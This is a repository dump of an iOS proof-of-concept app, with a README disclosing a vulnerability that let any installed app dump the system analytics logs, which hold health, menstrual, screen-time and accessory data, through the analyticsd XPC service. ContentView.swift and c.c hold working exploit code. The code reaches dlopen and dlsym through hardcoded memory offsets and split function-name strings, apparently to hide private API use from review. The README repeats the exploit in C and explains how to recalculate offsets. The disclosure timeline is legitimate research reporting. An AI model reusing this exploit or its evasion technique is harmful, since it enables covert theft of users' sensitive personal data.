Repository: illusionofchaos/ios-analyticsd-pre14.7-exploit Branch: main Commit: a617cb0c5f37 Files: 15 Total size: 29.1 KB Directory structure: gitextract_735k5gzs/ ├── .gitignore ├── Analyticsd/ │ ├── Analyticsd-Bridging-Header.h │ ├── AnalyticsdApp.swift │ ├── Assets.xcassets/ │ │ ├── AccentColor.colorset/ │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset/ │ │ │ └── Contents.json │ │ └── Contents.json │ ├── ContentView.swift │ ├── Info.plist │ ├── Preview Content/ │ │ └── Preview Assets.xcassets/ │ │ └── Contents.json │ ├── c.c │ └── c.h ├── Analyticsd.xcodeproj/ │ ├── project.pbxproj │ └── project.xcworkspace/ │ ├── contents.xcworkspacedata │ └── xcshareddata/ │ └── IDEWorkspaceChecks.plist └── README.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Xcode # # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore ## User settings xcuserdata/ ## compatibility with Xcode 8 and earlier (ignoring not required starting Xcode 9) *.xcscmblueprint *.xccheckout ## compatibility with Xcode 3 and earlier (ignoring not required starting Xcode 4) build/ DerivedData/ *.moved-aside *.pbxuser !default.pbxuser *.mode1v3 !default.mode1v3 *.mode2v3 !default.mode2v3 *.perspectivev3 !default.perspectivev3 ## Obj-C/Swift specific *.hmap ## App packaging *.ipa *.dSYM.zip *.dSYM ## Playgrounds timeline.xctimeline playground.xcworkspace # Swift Package Manager # # Add this line if you want to avoid checking in source code from Swift Package Manager dependencies. 
# Packages/ # Package.pins # Package.resolved # *.xcodeproj # # Xcode automatically generates this directory with a .xcworkspacedata file and xcuserdata # hence it is not needed unless you have added a package configuration file to your project # .swiftpm .build/ # CocoaPods # # We recommend against adding the Pods directory to your .gitignore. However # you should judge for yourself, the pros and cons are mentioned at: # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control # # Pods/ # # Add this line if you want to avoid checking in source code from the Xcode workspace # *.xcworkspace # Carthage # # Add this line if you want to avoid checking in source code from Carthage dependencies. # Carthage/Checkouts Carthage/Build/ # Accio dependency management Dependencies/ .accio/ # fastlane # # It is recommended to not store the screenshots in the git repo. # Instead, use fastlane to re-generate the screenshots whenever they are needed. # For more information about the recommended setup visit: # https://docs.fastlane.tools/best-practices/source-control/#source-control fastlane/report.xml fastlane/Preview.html fastlane/screenshots/**/*.png fastlane/test_output # Code Injection # # After new code Injection tools there's a generated folder /iOSInjectionProject # https://github.com/johnno1962/injectionforxcode iOSInjectionProject/ ================================================ FILE: Analyticsd/Analyticsd-Bridging-Header.h ================================================ #include "c.h" // //@import Foundation; // //typedef void * xpc_object_t; //typedef void * xpc_connection_t; //typedef void (^xpc_handler_t)(xpc_object_t object); // //xpc_connection_t xpc_connection_create_mach_service(const char *name, dispatch_queue_t targetq, uint64_t flags); //void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler); //void xpc_connection_resume(xpc_connection_t connection); //xpc_object_t 
xpc_dictionary_create(const char *const _Nonnull *keys, xpc_object_t _Nullable const *values, size_t count); //void xpc_dictionary_set_string(xpc_object_t xdict, const char *key, const char *string); //xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message); //const char * xpc_dictionary_get_string(xpc_object_t xdict, const char *key); ================================================ FILE: Analyticsd/AnalyticsdApp.swift ================================================ import SwiftUI @main struct AnalyticsdApp: App { var body: some Scene { WindowGroup { ContentView() } } } ================================================ FILE: Analyticsd/Assets.xcassets/AccentColor.colorset/Contents.json ================================================ { "colors" : [ { "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/Assets.xcassets/AppIcon.appiconset/Contents.json ================================================ { "images" : [ { "idiom" : "iphone", "scale" : "2x", "size" : "20x20" }, { "idiom" : "iphone", "scale" : "3x", "size" : "20x20" }, { "idiom" : "iphone", "scale" : "2x", "size" : "29x29" }, { "idiom" : "iphone", "scale" : "3x", "size" : "29x29" }, { "idiom" : "iphone", "scale" : "2x", "size" : "40x40" }, { "idiom" : "iphone", "scale" : "3x", "size" : "40x40" }, { "idiom" : "iphone", "scale" : "2x", "size" : "60x60" }, { "idiom" : "iphone", "scale" : "3x", "size" : "60x60" }, { "idiom" : "ipad", "scale" : "1x", "size" : "20x20" }, { "idiom" : "ipad", "scale" : "2x", "size" : "20x20" }, { "idiom" : "ipad", "scale" : "1x", "size" : "29x29" }, { "idiom" : "ipad", "scale" : "2x", "size" : "29x29" }, { "idiom" : "ipad", "scale" : "1x", "size" : "40x40" }, { "idiom" : "ipad", "scale" : "2x", "size" : "40x40" }, { "idiom" : "ipad", "scale" : "1x", "size" : "76x76" }, { "idiom" : "ipad", "scale" : "2x", "size" : "76x76" }, { "idiom" : 
"ipad", "scale" : "2x", "size" : "83.5x83.5" }, { "idiom" : "ios-marketing", "scale" : "1x", "size" : "1024x1024" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/Assets.xcassets/Contents.json ================================================ { "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/ContentView.swift ================================================ import SwiftUI struct ContentView: View { @State var json = "" @State var jsonData: [(String,Any)] = [] var body: some View { NavigationView { if !json.isEmpty { List { NavigationLink("Tree", destination: TreeView(data: jsonData)) NavigationLink("Raw JSON", destination: ScrollView(.vertical, showsIndicators: true, content: { Text(json) })) } } else { Text("wait") } } .onAppear { json = analyticsJson() jsonData = (try! JSONSerialization.jsonObject(with: json.data(using: .utf8)!, options: []) as! [String:Any]).sorted { $0.key < $1.key } } } } struct TreeView: View { let data: [(String,Any)] var body: some View { List(data, id: \.0) { row in if let value = row.1 as? [String:Any] { NavigationLink(row.0, destination: TreeView(data: value.sorted { $0.key < $1.key })) } else if let value = row.1 as? [[String:Any]] { NavigationLink(row.0, destination: List(Dictionary(grouping: value, by: { ($0["name"] as? String) ?? "no name" }) .sorted { $0.key < $1.key }, id: \.0) { row in let messages = row.1.map { ($0["message"] as? [String:Any])?.sorted { $0.key < $1.key } ?? 
[]} NavigationLink(row.0, destination: List { ForEach(messages, id: \.description) { message in Section(content: { ForEach(message, id: \.key) { row in HStack { Text(row.0) Spacer() Text("\(row.1)" as String) } } }) } }.listStyle(GroupedListStyle()) ) } ) } else { HStack { Text(row.0) Spacer() Text("\(row.1)" as String) } } } } } let dylib = normal_function1(["/usr/lib/system/libxp", ".dylib"].joined(separator: "c"), 0) let normalFunction3 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_create_mach_service"].joined(separator: "c")), to: (@convention(c) (UnsafePointer, DispatchQueue?, UInt64) -> (OpaquePointer)).self) let normalFunction4 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_set_event_handler"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self) let normalFunction5 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_resume"].joined(separator: "c")), to: (@convention(c) (OpaquePointer) -> Void).self) let normalFunction6 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_create"].joined(separator: "c")), to: (@convention(c) (OpaquePointer?, OpaquePointer?, Int) -> OpaquePointer).self) let normalFunction7 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_set_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer, UnsafePointer) -> Void).self) let normalFunction8 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_send_message_with_reply_sync"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, OpaquePointer) -> OpaquePointer).self) let normalFunction9 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_get_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer) -> UnsafePointer).self) func analyticsJson() -> String { let connection = normalFunction3("com.apple.analyticsd", nil, 2) normalFunction4(connection, { _ in }) normalFunction5(connection) let xdict = 
normalFunction6(nil, nil, 0) normalFunction7(xdict, "command", "log-dump") let reply = normalFunction8(connection, xdict) return String(cString: normalFunction9(reply, "log-dump")) } // //func analyticsJson() -> String { // let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) // xpc_connection_set_event_handler(connection, { _ in }) // xpc_connection_resume(connection) // let xdict = xpc_dictionary_create(nil, nil, 0) // xpc_dictionary_set_string(xdict, "command", "log-dump") // let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) // return String(cString: xpc_dictionary_get_string(reply, "log-dump")) //} ================================================ FILE: Analyticsd/Info.plist ================================================ CFBundleDevelopmentRegion $(DEVELOPMENT_LANGUAGE) CFBundleExecutable $(EXECUTABLE_NAME) CFBundleIdentifier $(PRODUCT_BUNDLE_IDENTIFIER) CFBundleInfoDictionaryVersion 6.0 CFBundleName $(PRODUCT_NAME) CFBundlePackageType $(PRODUCT_BUNDLE_PACKAGE_TYPE) CFBundleShortVersionString 1.0 CFBundleVersion 1 LSRequiresIPhoneOS UIApplicationSceneManifest UIApplicationSupportsMultipleScenes UIApplicationSupportsIndirectInputEvents UILaunchScreen UIRequiredDeviceCapabilities armv7 UISupportedInterfaceOrientations UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight UISupportedInterfaceOrientations~ipad UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight ================================================ FILE: Analyticsd/Preview Content/Preview Assets.xcassets/Contents.json ================================================ { "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/c.c ================================================ #include "c.h" void * normal_function1(const char * arg1, int arg2) { return 
((void *(*)(const char *, int))((long long)dyld_stub_binder - 20780))(arg1, arg2); } void * normal_function2(void * arg1, const char * arg2) { return ((void *(*)(void *, const char *))((long long)dyld_stub_binder - 20648))(arg1, arg2); } // //#include //#include //void findOffsets() { // printf("%lld\n",(long long)dyld_stub_binder - (long long)dlopen); // 20780 // printf("%lld\n",(long long)dyld_stub_binder - (long long)dlsym); // 20648 //} ================================================ FILE: Analyticsd/c.h ================================================ #ifndef c_h #define c_h #define NO_UND(func) extern void func(void) asm(#func); NO_UND(dyld_stub_binder); void * normal_function1(const char * arg1, int arg2); // dlopen void * normal_function2(void * arg1, const char * arg2); // dlsym //void findOffsets(); #endif /* c_h */ ================================================ FILE: Analyticsd.xcodeproj/project.pbxproj ================================================ // !$*UTF8*$! { archiveVersion = 1; classes = { }; objectVersion = 50; objects = { /* Begin PBXBuildFile section */ DF0878E12701ED240055F994 /* c.c in Sources */ = {isa = PBXBuildFile; fileRef = DF0878E02701ED240055F994 /* c.c */; }; DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC752638AE09007214FA /* AnalyticsdApp.swift */; }; DF41FC782638AE09007214FA /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC772638AE09007214FA /* ContentView.swift */; }; DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC792638AE0B007214FA /* Assets.xcassets */; }; DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ DF0878DF2701ED240055F994 /* c.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = c.h; 
sourceTree = ""; }; DF0878E02701ED240055F994 /* c.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = c.c; sourceTree = ""; }; DF41FC722638AE09007214FA /* Analyticsd.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Analyticsd.app; sourceTree = BUILT_PRODUCTS_DIR; }; DF41FC752638AE09007214FA /* AnalyticsdApp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AnalyticsdApp.swift; sourceTree = ""; }; DF41FC772638AE09007214FA /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; DF41FC792638AE0B007214FA /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; DF41FC7E2638AE0B007214FA /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "Analyticsd-Bridging-Header.h"; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ DF41FC6F2638AE09007214FA /* Frameworks */ = { isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ DF41FC692638AE09007214FA = { isa = PBXGroup; children = ( DF41FC742638AE09007214FA /* Analyticsd */, DF41FC732638AE09007214FA /* Products */, ); sourceTree = ""; }; DF41FC732638AE09007214FA /* Products */ = { isa = PBXGroup; children = ( DF41FC722638AE09007214FA /* Analyticsd.app */, ); name = Products; sourceTree = ""; }; DF41FC742638AE09007214FA /* 
Analyticsd */ = { isa = PBXGroup; children = ( DF41FC752638AE09007214FA /* AnalyticsdApp.swift */, DF41FC772638AE09007214FA /* ContentView.swift */, DF41FC792638AE0B007214FA /* Assets.xcassets */, DF41FC7E2638AE0B007214FA /* Info.plist */, DF41FC7B2638AE0B007214FA /* Preview Content */, DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */, DF0878DF2701ED240055F994 /* c.h */, DF0878E02701ED240055F994 /* c.c */, ); path = Analyticsd; sourceTree = ""; }; DF41FC7B2638AE0B007214FA /* Preview Content */ = { isa = PBXGroup; children = ( DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */, ); path = "Preview Content"; sourceTree = ""; }; /* End PBXGroup section */ /* Begin PBXNativeTarget section */ DF41FC712638AE09007214FA /* Analyticsd */ = { isa = PBXNativeTarget; buildConfigurationList = DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */; buildPhases = ( DF41FC6E2638AE09007214FA /* Sources */, DF41FC6F2638AE09007214FA /* Frameworks */, DF41FC702638AE09007214FA /* Resources */, ); buildRules = ( ); dependencies = ( ); name = Analyticsd; productName = Analyticsd; productReference = DF41FC722638AE09007214FA /* Analyticsd.app */; productType = "com.apple.product-type.application"; }; /* End PBXNativeTarget section */ /* Begin PBXProject section */ DF41FC6A2638AE09007214FA /* Project object */ = { isa = PBXProject; attributes = { LastSwiftUpdateCheck = 1250; LastUpgradeCheck = 1250; TargetAttributes = { DF41FC712638AE09007214FA = { CreatedOnToolsVersion = 12.5; LastSwiftMigration = 1250; }; }; }; buildConfigurationList = DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */; compatibilityVersion = "Xcode 9.3"; developmentRegion = en; hasScannedForEncodings = 0; knownRegions = ( en, Base, ); mainGroup = DF41FC692638AE09007214FA; productRefGroup = DF41FC732638AE09007214FA /* Products */; projectDirPath = ""; projectRoot = ""; targets = ( DF41FC712638AE09007214FA /* Analyticsd */, ); }; /* End 
PBXProject section */ /* Begin PBXResourcesBuildPhase section */ DF41FC702638AE09007214FA /* Resources */ = { isa = PBXResourcesBuildPhase; buildActionMask = 2147483647; files = ( DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */, DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXResourcesBuildPhase section */ /* Begin PBXSourcesBuildPhase section */ DF41FC6E2638AE09007214FA /* Sources */ = { isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( DF0878E12701ED240055F994 /* c.c in Sources */, DF41FC782638AE09007214FA /* ContentView.swift in Sources */, DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXSourcesBuildPhase section */ /* Begin XCBuildConfiguration section */ DF41FC7F2638AE0B007214FA /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; CLANG_CXX_LIBRARY = "libc++"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; CLANG_WARN_UNGUARDED_AVAILABILITY = 
YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = dwarf; ENABLE_STRICT_OBJC_MSGSEND = YES; ENABLE_TESTABILITY = YES; GCC_C_LANGUAGE_STANDARD = gnu11; GCC_DYNAMIC_NO_PIC = NO; GCC_NO_COMMON_BLOCKS = YES; GCC_OPTIMIZATION_LEVEL = 0; GCC_PREPROCESSOR_DEFINITIONS = ( "DEBUG=1", "$(inherited)", ); GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 14.5; MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; MTL_FAST_MATH = YES; ONLY_ACTIVE_ARCH = YES; SDKROOT = iphoneos; SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; }; name = Debug; }; DF41FC802638AE0B007214FA /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; CLANG_CXX_LIBRARY = "libc++"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; 
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; ENABLE_NS_ASSERTIONS = NO; ENABLE_STRICT_OBJC_MSGSEND = YES; GCC_C_LANGUAGE_STANDARD = gnu11; GCC_NO_COMMON_BLOCKS = YES; GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 14.5; MTL_ENABLE_DEBUG_INFO = NO; MTL_FAST_MATH = YES; SDKROOT = iphoneos; SWIFT_COMPILATION_MODE = wholemodule; SWIFT_OPTIMIZATION_LEVEL = "-O"; VALIDATE_PRODUCT = YES; }; name = Release; }; DF41FC822638AE0B007214FA /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_STYLE = Automatic; DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\""; DEVELOPMENT_TEAM = ZGR22SPY5B; ENABLE_PREVIEWS = YES; INFOPLIST_FILE = Analyticsd/Info.plist; IPHONEOS_DEPLOYMENT_TARGET = 14.0; LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h"; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Debug; }; DF41FC832638AE0B007214FA /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_STYLE = Automatic; DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\""; DEVELOPMENT_TEAM = ZGR22SPY5B; ENABLE_PREVIEWS = YES; INFOPLIST_FILE = Analyticsd/Info.plist; IPHONEOS_DEPLOYMENT_TARGET = 14.0; 
LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Release; }; /* End XCBuildConfiguration section */ /* Begin XCConfigurationList section */ DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */ = { isa = XCConfigurationList; buildConfigurations = ( DF41FC7F2638AE0B007214FA /* Debug */, DF41FC802638AE0B007214FA /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */ = { isa = XCConfigurationList; buildConfigurations = ( DF41FC822638AE0B007214FA /* Debug */, DF41FC832638AE0B007214FA /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; /* End XCConfigurationList section */ }; rootObject = DF41FC6A2638AE09007214FA /* Project object */; } ================================================ FILE: Analyticsd.xcodeproj/project.xcworkspace/contents.xcworkspacedata ================================================ ================================================ FILE: Analyticsd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist ================================================ IDEDidComputeMac32BitWarning ================================================ FILE: README.md ================================================ # Analyticsd pre-14.7 exploit I've updated this code to avoid using Private API directly. Read more in my [blog post](https://habr.com/en/post/580272/). However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in `c.c` file. 
The original code can be found in the [direct](https://github.com/illusionofchaos/ios-analyticsd-pre14.7-exploit/tree/direct) branch.

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in **Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily...**). These logs contain the following information (including, but not limited to):

- medical information (heart rate, count of detected atrial fibrillation and irregular heart rhythm events)
- menstrual cycle length, biological sex and age, whether the user is logging sexual activity, cervical mucus quality, etc.
- device usage information (device pickups in different contexts, push notifications count and user's action, etc.)
- screen time information and session count for all applications with their respective bundle IDs
- information about device accessories with their manufacturer, model, firmware version and user-assigned names
- application crashes with bundle IDs and exception codes
- languages of web pages that the user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That's why it's very hypocritical of Apple to [claim that they deeply care about privacy](https://www.apple.com/privacy/). All this data was being collected and available to an attacker even if "Share analytics" was turned off in settings.
```
const char * analytics_json(void) {
    xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.analyticsd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    xpc_connection_set_event_handler(connection, (^(xpc_object_t object){}));
    xpc_connection_resume(connection);
    xpc_object_t xdict = xpc_dictionary_create(0, 0, 0);
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    return xpc_dictionary_get_string(reply, "log-dump");
}
```

Timeline:

April 29 2021 - I sent a detailed report to Apple

April 30 2021 - Apple replied that they had reviewed the report and are investigating

May 20 2021 - I've requested a status update from Apple (and received no reply)

May 30 2021 - I've requested a status update from Apple

June 3 2021 - Apple replied that they plan to address the issue in the upcoming update

July 19 2021 - iOS 14.7 is released with the fix

July 20 2021 - I've requested a status update from Apple

July 21 2021 - iOS 14.7 security contents list is published, this vulnerability is not mentioned (https://support.apple.com/en-us/HT212601)

July 22 2021 - I've asked Apple a question why the vulnerability is not on the list

Same day I received the following reply:

**Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience.**

July 26 2021 - iOS 14.7.1 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212623)

September 13 2021 - iOS 14.8 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212807)

Same day I asked for an explanation and informed Apple that I would make all my research public unless I receive a reply soon.
September 20 2021 - iOS 15.0 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212814)

September 24 2021 - I still haven't received any reply